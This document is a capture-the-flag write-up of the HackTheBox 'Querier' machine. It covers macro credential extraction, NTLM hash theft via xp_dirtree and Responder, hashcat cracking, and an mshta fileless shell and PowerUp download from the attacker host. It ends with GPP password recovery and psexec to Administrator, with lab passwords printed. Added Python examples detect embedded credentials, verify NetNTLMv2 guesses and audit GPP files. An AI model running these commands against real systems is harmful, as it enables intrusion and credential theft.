[Meachines] [Medium] Querier XLSM macro + MSSQL NTLM hash theft (…

2024-09-25

Information Gathering

IP Address    Open Ports
10.10.10.125 TCP:135, 139, 445, 1433, 5985, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670, 49671

$ nmap -p- 10.10.10.125 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-09-22T05:41:06+00:00; -10m49s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-22T05:34:45
|_Not valid after:  2054-09-22T05:34:45
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
11560/tcp filtered unknown
22269/tcp filtered unknown
24527/tcp filtered unknown
28228/tcp filtered unknown
43876/tcp filtered unknown
46253/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

$ smbmap -H 10.10.10.125 -u 1

$ smbclient //10.10.10.125/Reports

smb: \> get "Currency Volume Report.xlsm"

$ ~/.local/bin/olevba Currency\ Volume\ Report.xlsm

olevba 0.60.2 on Python 3.11.9 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

username:reporting password:PcwTWTHRwryjc$c6
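The macro above hands a SQL login and password to anyone who can open the workbook, because the connection string is a plain string literal inside the VBA project. The following Python example is added here (it is not from the page, and not part of oletools); it takes VBA source in the form olevba prints it and reports every ODBC/OLE DB style connection string that carries an embedded password, masking the secret so the report itself does not leak it. The sample macro, server name DBHOST and password ExamplePass1 are constructed for the example.

```python
import re

# Constructed sample: VBA source of the kind olevba extracts from an .xlsm
# (modelled on the page's macro, but with made-up server and password).
SAMPLE_VBA = '''
Private Sub Connect()
Dim conn As ADODB.Connection
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=DBHOST;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=ExamplePass1"
conn.Open
End Sub
'''

# A double-quoted VBA string literal that looks like a connection string.
CONN_STRING_RE = re.compile(
    r'"([^"\n]*?(?:Driver=|Provider=|Data Source=|Server=)[^"\n]*)"', re.IGNORECASE)
SECRET_KEYS = {"pwd", "password"}
USER_KEYS = {"uid", "user id", "user"}


def parse_connection_string(s):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    parts = {}
    for item in s.split(";"):
        if "=" not in item:
            continue
        key, value = item.split("=", 1)
        parts[key.strip().lower()] = value.strip()
    return parts


def mask(secret):
    """Keep two characters so an analyst can match the finding, hide the rest."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def find_embedded_credentials(vba_source):
    """Return one finding per connection string that embeds a password."""
    findings = []
    for lineno, line in enumerate(vba_source.splitlines(), 1):
        for match in CONN_STRING_RE.finditer(line):
            parts = parse_connection_string(match.group(1))
            secret_key = next((k for k in parts if k in SECRET_KEYS), None)
            if secret_key is None:
                continue  # integrated auth or no password: nothing to flag
            user_key = next((k for k in parts if k in USER_KEYS), None)
            findings.append({
                "line": lineno,
                "server": parts.get("server") or parts.get("data source"),
                "database": parts.get("database") or parts.get("initial catalog"),
                "user": parts.get(user_key) if user_key else None,
                "password_masked": mask(parts[secret_key]),
                "windows_auth": parts.get("trusted_connection", "").lower() == "yes",
            })
    return findings


if __name__ == "__main__":
    for finding in find_embedded_credentials(SAMPLE_VBA):
        print(finding)
```

In practice the input is the text between olevba's "VBA MACRO" separators; the same check applied to documents on a file share or in a mail gateway turns a macro like this one into a ticket to rotate the SQL login before anyone else downloads the report.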

reporting -> mssql-svc (stealing the MSSQL service account's NTLM hash via MSSQL): xp_dirtree

$ responder -I tun0

$ impacket-mssqlclient reporting@10.10.10.125 -windows-auth

Executing xp_cmdshell fails: commands cannot be run.

SQL> EXEC master..xp_dirtree '\\10.10.16.9\GOT', 1, 1;

The NTLM hash is captured in Responder:

mssql-svc::QUERIER:50c6614a98bf…

$ hashcat -m 5600 svc /usr/share/wordlists/rockyou.txt --force

username:mssql-svc password:corporate568
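To make concrete what Responder captured and what hashcat -m 5600 is actually testing, here is an added Python example (written for this page, not the author's code and not hashcat's or Responder's). It parses a NetNTLMv2 line in the user::domain:challenge:NTProofStr:blob layout, recomputes NTProofStr for a candidate password (NT hash, then NTOWFv2, then HMAC-MD5 over challenge and blob), and reports whether the candidate reproduces the captured value. MD4 is implemented in pure Python because OpenSSL 3 only offers it through its legacy provider. The sample line, account svc-demo, domain EXAMPLE, password Winter2024! and the challenge and blob bytes are all constructed here.

```python
import hmac
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """Pure-Python MD4 (RFC 1320): the hash behind every NT hash."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password, user, domain):
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain), concatenation in UTF-16LE."""
    key = nt_hash(password)
    return hmac.new(key, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, server challenge || blob): the 32-hex field hashcat checks."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_netntlmv2(line):
    """Split a Responder / hashcat -m 5600 line: user::domain:challenge:ntproofstr:blob."""
    user, rest = line.strip().split("::", 1)
    domain, challenge, proof, blob = rest.split(":", 3)
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("field lengths do not match NetNTLMv2 (8-byte challenge, 16-byte NTProofStr)")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_candidate(line, candidate):
    """True when `candidate` reproduces the captured NTProofStr."""
    h = parse_netntlmv2(line)
    computed = nt_proof_str(candidate, h["user"], h["domain"], h["challenge"], h["blob"])
    return hmac.compare_digest(computed, h["proof"])


def first_match(line, candidates):
    """What mode 5600 does at scale: first candidate that matches, or None."""
    for pw in candidates:
        if check_candidate(line, pw):
            return pw
    return None


def make_sample_line(user, domain, password):
    """Build a constructed capture line (test data only, not the hash from the page)."""
    server_challenge = bytes.fromhex("1122334455667788")   # constructed 8-byte server challenge
    blob = (bytes.fromhex("0101000000000000")               # NTLMv2 blob header
            + bytes(8)                                      # timestamp, zeroed for the example
            + bytes.fromhex("a1a2a3a4a5a6a7a8")             # constructed client challenge
            + bytes(4) + bytes(4))                          # reserved + empty AV-pair list (simplified)
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


SAMPLE_LINE = make_sample_line("svc-demo", "EXAMPLE", "Winter2024!")

if __name__ == "__main__":
    print(parse_netntlmv2(SAMPLE_LINE)["user"])
    print(first_match(SAMPLE_LINE, ["password", "letmein", "Winter2024!"]))
```

Each guess costs one MD4 and two HMAC-MD5 operations, which is why a service account whose password appears in a wordlist falls to a single rockyou pass. The exposure on this box comes from two configuration choices, not from a software bug: the SQL service runs under a regular account with a guessable password, and the server is allowed to make outbound SMB connections, so a UNC path passed to xp_dirtree authenticates to whatever host the caller names. A long random password or a group managed service account for the SQL service, and blocking outbound TCP 445 from database servers, removes both halves.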

$ impacket-mssqlclient mssql-svc:'corporate568'@10.10.10.125 -windows-auth

SQL (QUERIER\mssql-svc dbo@master)> enable_xp_cmdshell

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami

Use koadic for a fileless reverse shell:

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "mshta http://10.10.16.9:9999/maW6M"

User.txt

42413863de7ecbfa91a1e935705940cd

Privilege escalation (mssql-svc -> Administrator): GPP credential leak

Windows privilege escalation enumeration script:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

[koadic: ZOMBIE 0 (10.10.10.125) - C:\\Users\Public\Download]> curl -o C:\\Users\Public\Downloads\PowerUp.ps1 http://10.10.16.9/PowerUp.ps1

[koadic: ZOMBIE 0 (10.10.10.125) - C:\\Users\Public\Download]> C:\\Users\Public\Downloads\PowerUp.ps1 && Invoke-AllChecks

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2212
ProcessId   : 192
Name        : 192
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files

username:Administrator password:MyUnclesAreMarioAndLuigi!!1!
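PowerUp's "Cached GPP Files" check found a cpassword attribute in the machine's Group Policy history; the same condition can be audited without PowerUp. The Python example below is added for this page (it is not PowerUp's code) and generalises the check to every preference file type that can carry cpassword (Groups, Services, ScheduledTasks, DataSources, Drives, Printers). It walks a directory such as a SYSVOL copy or C:\ProgramData\Microsoft\Group Policy\History, reports the account, item and change time for each non-empty cpassword, and deliberately does not output or decrypt the value. The sample Groups.xml and its cpassword value are constructed placeholders, not the file from the page.

```python
import os
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (Group Policy Preferences, MS14-025).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attribute naming the account, per file type (Groups/Drives, Services, ScheduledTasks, DataSources).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample modelled on a Groups.xml entry; the cpassword value is a placeholder.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2"
        changed="2019-01-28 23:12:48" uid="{00000000-0000-0000-0000-000000000000}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_BASE64_CPASSWORD" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="Administrator"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element whose cpassword attribute is non-empty."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    # ElementTree has no parent pointers; the item metadata (name, changed) lives on the parent.
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword", "")
        if not cpw:
            continue  # absent or blank: no stored password
        parent = parents.get(elem)
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), None)
        findings.append({
            "file": source,
            "item": parent.attrib.get("name") if parent is not None else None,
            "account": account,
            "new_name": elem.attrib.get("newName") or None,
            "changed": parent.attrib.get("changed") if parent is not None else None,
            "cpassword_length": len(cpw),  # the value itself is never reported
        })
    return findings


def scan_directory(root_dir):
    """Walk a SYSVOL copy or the local Group Policy\\History tree and audit every GPP file."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except ET.ParseError:
                findings.append({"file": path, "error": "not well-formed XML"})
    return findings


if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(finding)
```

MS14-025 stopped the management console from writing new cpassword values but did not remove the ones already in SYSVOL or in each client's cached history, and the AES key that protects them is public. The fix for a finding is therefore to delete the preference item and reset the account it names, since any user who could read the file must be assumed to have the password.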

$ impacket-psexec administrator@10.10.10.125

Root.txt

8f359d26d9cfd60e2f5fcbcb98239102
